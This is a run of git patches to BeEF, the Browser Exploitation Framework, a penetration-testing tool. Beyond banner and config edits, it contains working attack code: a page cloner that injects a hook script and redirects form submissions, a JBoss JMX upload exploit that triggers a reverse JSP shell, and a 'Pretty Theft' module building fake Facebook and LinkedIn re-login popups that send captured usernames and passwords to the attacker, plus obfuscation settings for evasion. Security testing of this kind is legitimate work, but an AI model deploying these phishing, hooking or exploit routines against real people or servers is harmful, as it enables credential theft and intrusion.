Date: Fri, 14 Sep 2012 21:08:47 +1000
Subject: [PATCH 042/397] Changed update method in stdout

---
 core/main/console/banners.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/core/main/console/banners.rb b/core/main/console/banners.rb
index 7372c62df..0c2045320 100644
--- a/core/main/console/banners.rb
+++ b/core/main/console/banners.rb
@@ -44,7 +44,7 @@ module Banners
         data =  "Version #{version}\n"
         data += "Website http://beefproject.com\n"
         data += "Run 'beef -h' for basic help.\n"
-        data += "Run 'git pull' to update to the latest revision."
+        data += "Run 'update-beef' to update to the latest revision."
         print_more data
     end
 

From 921a9928ff1b1703ddfa5fe0c07fbadc7a15ead4 Mon Sep 17 00:00:00 2001
From: Wade Alcorn <wade@bindshell.net>
Date: Fri, 14 Sep 2012 21:10:32 +1000
Subject: [PATCH 043/397] Added twitter account to stdout

---
 core/main/console/banners.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/core/main/console/banners.rb b/core/main/console/banners.rb
index 0c2045320..bbb1e621f 100644
--- a/core/main/console/banners.rb
+++ b/core/main/console/banners.rb
@@ -43,6 +43,7 @@ module Banners
         print_info "Browser Exploitation Framework (BeEF)"
         data =  "Version #{version}\n"
         data += "Website http://beefproject.com\n"
+        data += "Twitter @beefproject\n"
         data += "Run 'beef -h' for basic help.\n"
         data += "Run 'update-beef' to update to the latest revision."
         print_more data

From c8b7b506fa6dce65d5bb856b74f8c187fd37c755 Mon Sep 17 00:00:00 2001
From: Wade Alcorn <wade@bindshell.net>
Date: Fri, 14 Sep 2012 21:24:10 +1000
Subject: [PATCH 044/397] Tidied up splash

---
 core/main/console/banners.rb | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/core/main/console/banners.rb b/core/main/console/banners.rb
index bbb1e621f..258efbf1b 100644
--- a/core/main/console/banners.rb
+++ b/core/main/console/banners.rb
@@ -41,11 +41,11 @@ module Banners
         config = BeEF::Core::Configuration.instance
         version = config.get('beef.version')
         print_info "Browser Exploitation Framework (BeEF)"
-        data =  "Version #{version}\n"
-        data += "Website http://beefproject.com\n"
-        data += "Twitter @beefproject\n"
-        data += "Run 'beef -h' for basic help.\n"
-        data += "Run 'update-beef' to update to the latest revision."
+        data =  "Version: #{version}\n"
+        data += "Twitter: @beefproject\n"
+        data += "Website: http://beefproject.com\n"
+        data += "Blog: http://blog.beefproject.com\n"
+        data += "Help: run 'beef -h'\n"
         print_more data
     end
 

From 87e3262bae4911713bb1d4774d2fdb61c31c084f Mon Sep 17 00:00:00 2001
From: Wade Alcorn <wade@bindshell.net>
Date: Fri, 14 Sep 2012 21:36:50 +1000
Subject: [PATCH 045/397] Tidied up splash

---
 core/main/console/banners.rb | 9 ++++-----
 1 file changed, 4 insertions(+), 5 deletions(-)

diff --git a/core/main/console/banners.rb b/core/main/console/banners.rb
index 258efbf1b..cb460a0b2 100644
--- a/core/main/console/banners.rb
+++ b/core/main/console/banners.rb
@@ -40,12 +40,11 @@ module Banners
     def print_welcome_msg
         config = BeEF::Core::Configuration.instance
         version = config.get('beef.version')
-        print_info "Browser Exploitation Framework (BeEF)"
-        data =  "Version: #{version}\n"
-        data += "Twitter: @beefproject\n"
-        data += "Website: http://beefproject.com\n"
+        print_info "Browser Exploitation Framework (BeEF) #{version}"
+        data = "Twit: @beefproject\n"
+        data += "Site: http://beefproject.com\n"
         data += "Blog: http://blog.beefproject.com\n"
-        data += "Help: run 'beef -h'\n"
+        data += "Wiki: https://github.com/beefproject/beef/wiki\n"
         print_more data
     end
 

From 074ca17e42c781c36dfc4731c086692d76e81329 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Mon, 17 Sep 2012 10:58:07 +0100
Subject: [PATCH 046/397] Added missing cloned_page directory to web_cloner.
 Added readme.txt on that directory. Enabled the social engineering extension
 by default. Enabled all the obfuscation techniques in the evasion extension
 config.

---
 .gitignore                                           |  3 +--
 config.yaml                                          |  2 +-
 extensions/evasion/config.yaml                       |  3 +--
 .../web_cloner/cloned_pages/readme.txt               | 12 ++++++++++++
 4 files changed, 15 insertions(+), 5 deletions(-)
 create mode 100644 extensions/social_engineering/web_cloner/cloned_pages/readme.txt

diff --git a/.gitignore b/.gitignore
index 9ebc010fe..c02e0a406 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,4 +1,3 @@
 beef.db
 test/msf-test
-custom-config.yaml
-extensions/social_engineering/web_cloner/cloned_pages
\ No newline at end of file
+custom-config.yaml
\ No newline at end of file
diff --git a/config.yaml b/config.yaml
index 06b0b361a..a0d9db706 100644
--- a/config.yaml
+++ b/config.yaml
@@ -93,7 +93,7 @@ beef:
         metasploit:
             enable: false
         social_engineering:
-            enable: false
+            enable: true
         evasion:
             enable: false
         console:
diff --git a/extensions/evasion/config.yaml b/extensions/evasion/config.yaml
index 7d9db7f91..50140c4f4 100644
--- a/extensions/evasion/config.yaml
+++ b/extensions/evasion/config.yaml
@@ -26,5 +26,4 @@ beef:
               beef: "beef"
               Beef: "Beef"
               evercookie: "evercookie"
-            #chain: ["scramble", "minify"]
-            chain: ["minify", "base64", "whitespace"]
+            chain: ["scramble", "minify", "base_64", "whitespace"]
diff --git a/extensions/social_engineering/web_cloner/cloned_pages/readme.txt b/extensions/social_engineering/web_cloner/cloned_pages/readme.txt
new file mode 100644
index 000000000..5d5f93d45
--- /dev/null
+++ b/extensions/social_engineering/web_cloner/cloned_pages/readme.txt
@@ -0,0 +1,12 @@
+This is the directory where the cloned pages will be placed.
+If you cloce beefproject.com, there will be 2 files:
+ - beefproject.com  <- original, unmodified
+ - beefproject.com_mod  <- modified one
+
+In case you want to further modify the beefproject.com_mod manually,
+and serve it throught BeEF, do the following:
+ - clone the page
+ - modify the x_mod file
+ - clone the same page again, adding the "use_existing":"true" parameter in the RESTful API call.
+
+In this way the x_mod page will be served, with your custom modifications.
\ No newline at end of file

From e56b083ad5c9ce13e42ff7de75ebd8d7a30d5e94 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Mon, 17 Sep 2012 11:03:13 +0100
Subject: [PATCH 047/397] Fixed typos in readme.txt for web_cloner

---
 .../social_engineering/web_cloner/cloned_pages/readme.txt   | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/extensions/social_engineering/web_cloner/cloned_pages/readme.txt b/extensions/social_engineering/web_cloner/cloned_pages/readme.txt
index 5d5f93d45..ba99c53af 100644
--- a/extensions/social_engineering/web_cloner/cloned_pages/readme.txt
+++ b/extensions/social_engineering/web_cloner/cloned_pages/readme.txt
@@ -1,12 +1,12 @@
 This is the directory where the cloned pages will be placed.
-If you cloce beefproject.com, there will be 2 files:
+If you clone beefproject.com, there will be 2 files:
  - beefproject.com  <- original, unmodified
  - beefproject.com_mod  <- modified one
 
 In case you want to further modify the beefproject.com_mod manually,
-and serve it throught BeEF, do the following:
+and serve it through BeEF, do the following:
  - clone the page
- - modify the x_mod file
+ - modify the beefproject.com_mod file
  - clone the same page again, adding the "use_existing":"true" parameter in the RESTful API call.
 
 In this way the x_mod page will be served, with your custom modifications.
\ No newline at end of file

From 9c7c81bd7ffc9dfa99bf948639c3f565dac7ae20 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Mon, 17 Sep 2012 12:54:10 +0100
Subject: [PATCH 048/397] Web_cloner: managed a corner case when html elements
 are uppercase (HEAD, FORM)

---
 extensions/social_engineering/web_cloner/web_cloner.rb | 10 +++++++---
 1 file changed, 7 insertions(+), 3 deletions(-)

diff --git a/extensions/social_engineering/web_cloner/web_cloner.rb b/extensions/social_engineering/web_cloner/web_cloner.rb
index 5f56f2ae8..19313f365 100644
--- a/extensions/social_engineering/web_cloner/web_cloner.rb
+++ b/extensions/social_engineering/web_cloner/web_cloner.rb
@@ -57,7 +57,7 @@ module BeEF
               File.open("#{@cloned_pages_dir + output_mod}", 'w') do |out_file|
                 File.open("#{@cloned_pages_dir + output}", 'r').each do |line|
                   # Modify the <form> line changing the action URI to / in order to be properly intercepted by BeEF
-                  if line.include?("<form ")
+                  if line.include?("<form ") || line.include?("<FORM ")
                     line_attrs = line.split(" ")
                     c = 0
                     cc = 0
@@ -87,7 +87,7 @@ module BeEF
                     print_info "Form action value changed in order to be intercepted :-D"
                     out_file.print mod_form
                     # Add the BeEF hook
-                  elsif line.include?("</head>") && @config.get('beef.extension.social_engineering.web_cloner.add_beef_hook')
+                  elsif (line.include?("</head>") || line.include?("</HEAD>")) && @config.get('beef.extension.social_engineering.web_cloner.add_beef_hook')
                     out_file.print add_beef_hook(line)
                     print_info "BeEF hook added :-D"
                   else
@@ -128,7 +128,11 @@ module BeEF
         private
         # Replace </head> with <BeEF_hook></head>
         def add_beef_hook(line)
-           line.gsub!("</head>","<script type=\"text/javascript\" src=\"#{@beef_hook}\"></script>\n</head>")
+           if line.include?("</head>")
+             line.gsub!("</head>","<script type=\"text/javascript\" src=\"#{@beef_hook}\"></script>\n</head>")
+           elsif
+             line.gsub!("</HEAD>","<script type=\"text/javascript\" src=\"#{@beef_hook}\"></script>\n</HEAD>")
+           end
            line
         end
 

From 9b62ae83dc8e50be5516e9144e2cfad532abe9d9 Mon Sep 17 00:00:00 2001
From: bmantra <bart.leppens@gmail.com>
Date: Tue, 18 Sep 2012 20:59:54 +0200
Subject: [PATCH 049/397] fix jboss exploit with forge_request

---
 modules/exploits/jboss_jmx_upload_exploit/command.js  | 10 +++++-----
 modules/exploits/jboss_jmx_upload_exploit/config.yaml |  1 +
 2 files changed, 6 insertions(+), 5 deletions(-)

diff --git a/modules/exploits/jboss_jmx_upload_exploit/command.js b/modules/exploits/jboss_jmx_upload_exploit/command.js
index 1d64217ff..a700594a1 100644
--- a/modules/exploits/jboss_jmx_upload_exploit/command.js
+++ b/modules/exploits/jboss_jmx_upload_exploit/command.js
@@ -43,11 +43,11 @@ beef.execute(function() {
     uri = "/jmx-console/HtmlAdaptor;index.jsp?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=%2Fconsole-mgr.sar/web-console.war%2F&arg1=" + jspName + "&arg2=.jsp&arg3=" + payload + "&arg4=True";
 
     /* always use dataType: script when doing cross-domain XHR, otherwise even if the HTTP resp is 200, jQuery.ajax will always launch the error() event*/
-	beef.net.request("http", "HEAD", rhost, rport, uri,null, null, 10, 'script', function(response){
-         if(response.status_code == "success"){
+	beef.net.forge_request("http", "HEAD", rhost, rport, uri, null, null, null, 10, 'script', true, null,function(response){
+         if(response.status_code == 200){
              function triggerReverseConn(){
-                beef.net.request("http", "GET", rhost, rport,"/web-console/" + jspName + ".jsp", null, null, 10, 'script', function(response){
-                    if(response.status_code == "success"){
+                beef.net.forge_request("http", "GET", rhost, rport,"/web-console/" + jspName + ".jsp", null, null, null, 10, 'script', true, null,function(response){
+                    if(response.status_code == 200){
                          if(payloadType == "reverse"){
                              beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Reverse JSP shell should have been triggered. Check your MSF handler listener.");
                          }else{
@@ -64,4 +64,4 @@ beef.execute(function() {
              beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: first HEAD request failed.");
          }
     });
-});
\ No newline at end of file
+});
diff --git a/modules/exploits/jboss_jmx_upload_exploit/config.yaml b/modules/exploits/jboss_jmx_upload_exploit/config.yaml
index 880a582a3..d98d4a52a 100644
--- a/modules/exploits/jboss_jmx_upload_exploit/config.yaml
+++ b/modules/exploits/jboss_jmx_upload_exploit/config.yaml
@@ -23,3 +23,4 @@ beef:
             authors: ["antisnatchor", "l33tb0y"]
             target:
                 working: ["ALL"]
+                not_working: "O"

From 68bfb46bc74d0f91962317c725431568f05b4793 Mon Sep 17 00:00:00 2001
From: Jean-Louis Huynen <huynenjl@gmail.com>
Date: Thu, 20 Sep 2012 11:26:27 +0200
Subject: [PATCH 050/397] remplace setInterval by setTimeout in
 chromecerbeggar.js template

---
 .../simple_hijacker/templates/chromecertbeggar.js               | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/social_engineering/simple_hijacker/templates/chromecertbeggar.js b/modules/social_engineering/simple_hijacker/templates/chromecertbeggar.js
index d1adce6d5..15bef871b 100644
--- a/modules/social_engineering/simple_hijacker/templates/chromecertbeggar.js
+++ b/modules/social_engineering/simple_hijacker/templates/chromecertbeggar.js
@@ -12,7 +12,7 @@
 
   forward = function(){
     send("User continuing to "+target);
-    timer=setInterval(function(){window.location = target;},500);
+    timer=setTimeout(function(){window.location = target;},500);
   }
   
   getDomain = function(url){

From 483683ca78deb71f7d128e27f81fb523fe4d4f7b Mon Sep 17 00:00:00 2001
From: pwndizzle <root@hacker.(none)>
Date: Sat, 22 Sep 2012 18:38:09 +0800
Subject: [PATCH 051/397] Added Facebook and Linkedin popups, also some
 code/logic improvements

---
 .../pretty_theft/command.js                   | 143 ++++++++++++++----
 .../pretty_theft/config.yaml                  |   4 +-
 .../social_engineering/pretty_theft/module.rb |   6 +-
 3 files changed, 123 insertions(+), 30 deletions(-)

diff --git a/modules/social_engineering/pretty_theft/command.js b/modules/social_engineering/pretty_theft/command.js
index f53d6e311..911ffd801 100644
--- a/modules/social_engineering/pretty_theft/command.js
+++ b/modules/social_engineering/pretty_theft/command.js
@@ -50,16 +50,18 @@ beef.execute(function() {
 	  }
 	  if (vis) {
 	    // Calculate the page width and height 
-	    if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) {
-	        var pageWidth = document.body.scrollWidth+'px';
-	        var pageHeight = document.body.scrollHeight+'px';
-	    } else if( document.body.offsetWidth ) {
-	      var pageWidth = document.body.offsetWidth+'px';
-	      var pageHeight = document.body.offsetHeight+'px';
-	    } else {
+	    //if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) {
+	    //    var pageWidth = document.body.scrollWidth+'px';
+	    //    var pageHeight = document.body.scrollHeight+'px';
+	    //} else if( document.body.offsetWidth ) {
+	    //  var pageWidth = document.body.offsetWidth+'px';
+	    //  var pageHeight = document.body.offsetHeight+'px';
+	    //} else {
+	    
+	    // Previous lines were not rendering page background correctly
 	       var pageWidth='100%';
 	       var pageHeight='100%';
-	    }
+	    //}
 	    //set the shader to cover the entire page and make it visible.
 	    dark.style.opacity=opaque;
 	    dark.style.MozOpacity=opaque;
@@ -74,46 +76,133 @@ beef.execute(function() {
 	  }
 	}
 
-	// function to send response
+	// CURRENTLY NOT USED
+	// Send done prompt to user
 	function win(){
-		document.getElementById('hax').innerHtml='<h2>Thank you for re-authenticating, you will now be returned to the application</h2>';
+		document.getElementById('popup').innerHtml='<h2>Thank you for re-authenticating, you will now be returned to the application</h2>';
 		answer = document.getElementById('uname').value+':'+document.getElementById('pass').value;
 	}
 
-	// perform darkening
-	grayOut(true);
 
+	// Check whether the user has entered a user/pass and pressed ok
 	function checker(){
-		processval = document.body.lastChild.getElementsByTagName("input")[2].value;
-		if (processval == "Processing..") {
-			uname = document.body.lastChild.getElementsByTagName("input")[0].value;
-			pass = document.body.lastChild.getElementsByTagName("input")[1].value;
-			answer = uname+":"+pass
+		uname1 = document.body.lastChild.getElementsByTagName("input")[0].value;
+		pass1 = document.body.lastChild.getElementsByTagName("input")[1].value;
+		valcheck = document.body.lastChild.getElementsByTagName("input")[3].value;
+		
+		if (uname1.length > 0 && pass1.length > 0 && valcheck == "true") {
+			// Join user/pass and send to attacker
+			answer = uname1+":"+pass1
   			beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);	
-			// set lastchild invisible
+			// Set lastchild invisible
 			document.body.lastChild.setAttribute('style','display:none');
-			// lighten screen
-			grayOut(false);
 			clearInterval(credgrabber);
-			$j('#hax').remove();
+			// Lighten screen
+			grayOut(false);
+			$j('#popup').remove();
 			$j('#darkenScreenObject').remove();
+
+		}else if((uname1.length == 0 || pass1.length == 0) && valcheck == "true"){
+		// If user has not entered any data reset button
+		document.body.lastChild.getElementsByTagName("input")[3].value = "false";
+		alert("Please enter a valid username and password.");		
 		}
 	}
 
 
-	// floating div
-	function writeit() {
+	// Facebook floating div
+	function facebook() {
+
 		sneakydiv = document.createElement('div');
-		sneakydiv.setAttribute('id', 'hax');
-		sneakydiv.setAttribute('style', 'width:400px;height:320px;position:absolute; top:30%; left:40%; z-index:51; background-color:ffffff;font-family:\'Arial\',Arial,sans-serif;border-width:thin;border-style:solid;border-color:#000000');
+		sneakydiv.setAttribute('id', 'popup');
+		sneakydiv.setAttribute('style', 'position:absolute; top:30%; left:40%; z-index:51; background-color:ffffff;');
+		document.body.appendChild(sneakydiv);
+		
+		// Set appearance using styles, maybe cleaner way to do this with CSS block?
+		var windowborder = 'style="width:330px;background:white;border:10px #999999 solid;border-radius:8px"';
+		var windowmain = 'style="border:1px #555 solid;"';
+ 		var tbarstyle = 'style="color: rgb(255, 255, 255); background-color: rgb(109, 132, 180);font-size: 13px;font-family:tahoma,verdana,arial,sans-serif;font-weight: bold;padding: 5px;padding-left:8px;text-align: left;height: 18px;"';
+		var bbarstyle = 'style="color: rgb(0, 0, 0);background-color: rgb(242, 242, 242);padding: 8px;text-align: right;border-top: 1px solid rgb(198, 198, 198);height:28px;margin-top:10px;"';
+		var messagestyle = 'style="align:left;font-size:11px;font-family:tahoma,verdana,arial,sans-serif;margin:10px 15px;line-height:12px;height:40px;"';
+		var box_prestyle = 'style="color: grey;font-size: 11px;font-weight: bold;font-family: tahoma,verdana,arial,sans-serif;padding-left:30px;"';
+		var inputboxstyle = 'style="width:140px;font-size: 11px;height: 20px;line-height:20px;padding-left:4px;border-style: solid;border-width: 1px;border-color: rgb(109,132,180);"';	
+		var buttonstyle = 'style="font-size: 13px;background:#627aac;color:#fff;font-weight:bold;border: 1px #29447e solid;padding: 3px 3px 3px 3px;clear:both;margin-right:5px;"';
+ 
+        	var title = 'Facebook Session Timed Out';
+	        var messagewords = 'Your session has timed out due to inactivity.<br/><br/>Please re-enter your username and password to login.';
+        	var buttonLabel = '<input type="button" name="ok" value="Log in" id="ok" ' +buttonstyle+ ' onClick="document.getElementById(\'buttonpress\').value=\'true\'" onMouseOver="this.bgColor=\'#00CC00\'" onMouseOut="this.bgColor=\'#009900\'" bgColor=#009900>';
+
+		// Build page including styles
+		sneakydiv.innerHTML= '<div id="window_container" '+windowborder+ '><div id="windowmain" ' +windowmain+ '><div id="title_bar" ' +tbarstyle+ '>' +title+ '</div><p id="message" ' +messagestyle+ '>' + messagewords + '</p><table><tr><td align="right"> <div id="box_pre" ' +box_prestyle+ '>Email: </div></td><td align="left"><input type="text" id="uname" value="" onkeydown="if (event.keyCode == 13) document.getElementById(\'buttonpress\').value=\'true\'"' +inputboxstyle+ '/></td></tr><tr><td align="right"><div id="box_pre" ' +box_prestyle+ '>Password: </div></td><td align="left"><input type="password" id="pass" name="pass" onkeydown="if (event.keyCode == 13) document.getElementById(\'buttonpress\').value=\'true\'"' +inputboxstyle+ '/></td></tr></table>' + '<div id="bottom_bar" ' +bbarstyle+ '>' +buttonLabel+ '<input type="hidden" id="buttonpress" name="buttonpress" value="false"/></div></div></div>';
+		
+		// Repeatedly check if button has been pressed
+		credgrabber = setInterval(checker,1000);
+	}
+
+
+	// Linkedin floating div
+	function linkedin() {
+
+		sneakydiv = document.createElement('div');
+		sneakydiv.setAttribute('id', 'popup');
+		sneakydiv.setAttribute('style', 'position:absolute; top:30%; left:40%; z-index:51; background-color:ffffff;');
+		document.body.appendChild(sneakydiv);
+
+		// Set appearance using styles, maybe cleaner way to do this with CSS block?
+		var windowborder = 'style="width:330px;background:white;border: 10px #999999 solid;border-radius:8px;"';
+		var windowmain = 'style="border:1px #555 solid;"';
+ 		var tbarstyle = 'style="color:white; font-size: 14px;font-family:Arial,sans-serif;font-weight: bold;outline-style: inherit;outline-color: #000000;outline-width: 1px;padding:5px;padding-left:8px;padding-right:6px;text-align: left;height: 22px;line-height:22px;border-bottom: 1px solid #CDCDCD;background: #F4F4F4;filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=#919191, endColorstr=#595959);background: -webkit-gradient(linear, left top, left bottom, from(#919191), to(#595959));background: -moz-linear-gradient(top,  #919191,  #595959);"';
+
+//-moz-box-shadow: 0 1px 4px #ccc;-webkit-box-shadow: 0 1px 4px #CCC;-o-box-shadow: 0 1px 4px #ccc;box-shadow: 0 1px 4px #CCC;
+
+		var bbarstyle = 'style="color: rgb(0, 0, 0);background-color: rgb(242, 242, 242);padding: 8px;text-align: right;border-top: 1px solid rgb(198, 198, 198);height:28px;margin-top:10px;"';
+		var messagestyle = 'style="align:left;font-size:11px;font-family:Arial,sans-serif;margin:10px 15px;line-height:12px;height:40px;"';
+		var box_prestyle = 'style="color: #666;font-size: 11px;font-weight: bold;font-family: Arial,sans-serif;padding-left:30px;"';
+		var inputboxstyle = 'style="width:140px;font-size: 11px;height: 20px;line-height:20px;padding-left:4px;border-style: solid;border-width: 1px;border-color:#CDCDCD;"';	
+		var buttonstyle = 'style="font-size: 13px;background:#069;color:#fff;font-weight:bold;border: 1px #29447e solid;padding: 3px 3px 3px 3px;clear:both;margin-right:5px;"';
+		var lilogo = 'http://press.linkedin.com/sites/all/themes/presslinkedin/images/LinkedIn_Logo_Web_Reverse_Trans2.png';
+        	var title = 'Session Timed Out <img src="' + lilogo + '" align=right height=20 width=70 alt="LinkedIn">';
+	        var messagewords = 'Your session has timed out due to inactivity.<br/><br/>Please re-enter your username and password to login.';
+        	var buttonLabel = '<input type="button" name="ok" value="Sign In" id="ok" ' +buttonstyle+ ' onClick="document.getElementById(\'buttonpress\').value=\'true\'" onMouseOver="this.bgColor=\'#00CC00\'" onMouseOut="this.bgColor=\'#009900\'" bgColor=#009900>';
+
+		// Build page including styles
+		sneakydiv.innerHTML= '<div id="window_container" '+windowborder+ '><div id="windowmain" ' +windowmain+ '><div id="title_bar" ' +tbarstyle+ '>' +title+ '</div><p id="message" ' +messagestyle+ '>' + messagewords + '</p><table><tr><td align="right"> <div id="box_pre" ' +box_prestyle+ '>Email: </div></td><td align="left"><input type="text" id="uname" value="" onkeydown="if (event.keyCode == 13) document.getElementById(\'buttonpress\').value=\'true\'"' +inputboxstyle+ '/></td></tr><tr><td align="right"><div id="box_pre" ' +box_prestyle+ '>Password: </div></td><td align="left"><input type="password" id="pass" name="pass" onkeydown="if (event.keyCode == 13) document.getElementById(\'buttonpress\').value=\'true\'"' +inputboxstyle+ '/></td></tr></table>' + '<div id="bottom_bar" ' +bbarstyle+ '>' +buttonLabel+ '<input type="hidden" id="buttonpress" name="buttonpress" value="false"/></div></div></div>';
+
+		// Repeatedly check if button has been pressed
+		credgrabber = setInterval(checker,1000);
+	}
+
+
+	// Generic floating div with image
+	function generic() {
+		sneakydiv = document.createElement('div');
+		sneakydiv.setAttribute('id', 'popup');
+		sneakydiv.setAttribute('style', 'width:400px;position:absolute; top:20%; left:40%; z-index:51; background-color:white;font-family:\'Arial\',Arial,sans-serif;border-width:thin;border-style:solid;border-color:#000000');
 		sneakydiv.setAttribute('align', 'center');
 		document.body.appendChild(sneakydiv);
-		sneakydiv.innerHTML= '<br><img src=\''+imgr+'\' width=\'80px\' height\'80px\' /><h2>Your session has timed out!</h2><p>For your security, your session has been timed out. To continue browsing this site, please re-enter your username and password below.</p><table border=\'0\'><tr><td>Username:</td><td><input type=\'text\' name=\'uname\' id=\'uname\' value=\'\' onkeydown=\'if (event.keyCode == 13) document.getElementById(\"lul\").value=\"Processing..\";\'></input></td></td><tr><td>Password:</td><td><input type=\'password\' name=\'pass\' id=\'pass\' value=\'\' onkeydown=\'if (event.keyCode == 13) document.getElementById(\"lul\").value=\"Processing..\";\'></input></td></tr></table><br><input type=\'button\' name=\'lul\' id=\'lul\' onClick=\'document.getElementById(\"lul\").value=\"Processing..\";\' value=\'Continue\'>';
+		sneakydiv.innerHTML= '<br><img src=\''+imgr+'\' width=\'80px\' height\'80px\' /><h2>Your session has timed out!</h2><p>For your security, your session has been timed out. To continue browsing this site, please re-enter your username and password below.</p><table border=\'0\'><tr><td>Username:</td><td><input type=\'text\' name=\'uname\' id=\'uname\' value=\'\' onkeydown=\'if (event.keyCode == 13) document.getElementById(\"buttonpress\").value=\"true\";\'></input></td></td><tr><td>Password:</td><td><input type=\'password\' name=\'pass\' id=\'pass\' value=\'\' onkeydown=\'if (event.keyCode == 13) document.getElementById(\"buttonpress\").value=\"true\";\'></input></td></tr></table><br><input type=\'button\' name=\'lul\' id=\'lul\' onClick=\'document.getElementById(\"buttonpress\").value=\"true\";\' value=\'Ok\'><br/><input type="hidden" id="buttonpress" name="buttonpress" value="false"/>';
+		
+		// Repeatedly check if button has been pressed		
 		credgrabber = setInterval(checker,1000);
 
 	}
 	
-	writeit();
+	// Set background opacity and apply background 
+	var backcolor = "<%== @backing %>";	  
+	if(backcolor == "Grey"){
+	grayOut(true,{'opacity':'70'});
+	}else if(backcolor == "Clear"){
+	grayOut(true,{'opacity':'0'});
+	}
 
+	// Retrieve the chosen div option from Beef and display
+	var choice = "<%= @choice %>";	
+	if(choice == "Facebook"){	
+	facebook();
+	} else if(choice == "LinkedIn"){
+	linkedin();	
+	} else{
+	generic();	
+	}
 
 });
diff --git a/modules/social_engineering/pretty_theft/config.yaml b/modules/social_engineering/pretty_theft/config.yaml
index ac175d6cd..e03c356bc 100644
--- a/modules/social_engineering/pretty_theft/config.yaml
+++ b/modules/social_engineering/pretty_theft/config.yaml
@@ -19,7 +19,7 @@ beef:
             enable: true
             category: "Social Engineering"
             name: "Pretty Theft"
-            description: "Asks the user for their username and password using a tidy floating div."
-            authors: ["vt [nick.freeman@security-assessment.com]", "xntrik"]
+            description: "Asks the user for their username and password using a floating div."
+            authors: ["pwndizzle", "vt [nick.freeman@security-assessment.com]", "xntrik"]
             target:
                 user_notify: ['ALL']
diff --git a/modules/social_engineering/pretty_theft/module.rb b/modules/social_engineering/pretty_theft/module.rb
index a816340c9..437f59819 100644
--- a/modules/social_engineering/pretty_theft/module.rb
+++ b/modules/social_engineering/pretty_theft/module.rb
@@ -19,7 +19,11 @@ class Pretty_theft < BeEF::Core::Command
     configuration = BeEF::Core::Configuration.instance
     logo_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/beef.png"
     return [
-        {'name' =>'imgsauce', 'description' =>'Custom Logo', 'ui_label'=>'Custom Logo', 'value' => logo_uri}
+		{'name' => 'choice', 'type' => 'combobox', 'ui_label' => 'Dialog Type', 'store_type' => 'arraystore', 'store_fields' => ['choice'], 'store_data' => [['Facebook'],['LinkedIn'],['Generic']], 'valueField' => 'choice', 'value' => 'Facebook', editable: false, 'displayField' => 'choice', 'mode' => 'local', 'autoWidth' => true },
+       		
+		{'name' => 'backing', 'type' => 'combobox', 'ui_label' => 'Backing', 'store_type' => 'arraystore', 'store_fields' => ['backing'], 'store_data' => [['Grey'],['Clear']], 'valueField' => 'backing', 'value' => 'Grey', editable: false, 'displayField' => 'backing', 'mode' => 'local', 'autoWidth' => true },
+
+		{'name' =>'imgsauce', 'description' =>'Custom Logo', 'ui_label'=>'Custom Logo (Generic only)', 'value' => logo_uri}
     ]
   end
   

From 95f5d78acc957da0b4070157c529f29269ffbf0d Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sun, 23 Sep 2012 16:04:25 +0930
Subject: [PATCH 052/397] Update supported browsers for lcamtuf download module

Opera blocks the `data:` URL popup by default.

Safari is no longer listed as either supported nor unsupported pending
further testing.
---
 modules/social_engineering/lcamtuf_download/config.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/social_engineering/lcamtuf_download/config.yaml b/modules/social_engineering/lcamtuf_download/config.yaml
index 329af0cbc..e081ec991 100644
--- a/modules/social_engineering/lcamtuf_download/config.yaml
+++ b/modules/social_engineering/lcamtuf_download/config.yaml
@@ -22,5 +22,5 @@ beef:
             description: "This module will attempt to execute a lcamtuf download.  The file will be served with an alternative <i>Content-Disposition: attachment</i> header.  For more information please refer to <a href='http://lcamtuf.blogspot.co.uk/2012/05/yes-you-can-have-fun-with-downloads.html'>http://lcamtuf.blogspot.co.uk/2012/05/yes-you-can-have-fun-with-downloads.html</a> ."
             authors: ["Bart Leppens"]
             target:
-                 user_notify: ["ALL"]
-                 not_working: ["IE"]
+                 user_notify: ["FF", "C"]
+                 not_working: ["IE", "O"]

From a135e9f51f3c310e3f7c956ccd1692730d3a4ff3 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sat, 29 Sep 2012 17:39:14 +0930
Subject: [PATCH 053/397] Update supported browsers for multiple modules

Pretty Theft module does not work in IE

Multiple exploit modules haven't been tested
---
 modules/exploits/axous_1_1_1_add_user_csrf/config.yaml          | 2 --
 modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml     | 2 --
 modules/exploits/spring_framework_malicious_jar/config.yaml     | 2 --
 modules/exploits/xss/alienvault_ossim_3.1_xss/config.yaml       | 2 --
 .../exploits/xss/cisco_collaboration_server_5_xss/config.yaml   | 2 --
 modules/exploits/xss/serendipity_1.6_xss/config.yaml            | 2 --
 modules/social_engineering/pretty_theft/config.yaml             | 1 +
 7 files changed, 1 insertion(+), 12 deletions(-)

diff --git a/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml b/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml
index 4231dc7e8..f1e802a65 100644
--- a/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml
+++ b/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml
@@ -21,5 +21,3 @@ beef:
             name: "Axous <= 1.1.1 Add User CSRF"
             description: "Attempts to add a user to an Axous <= 1.1.1 install (CVE-2012-2629)."
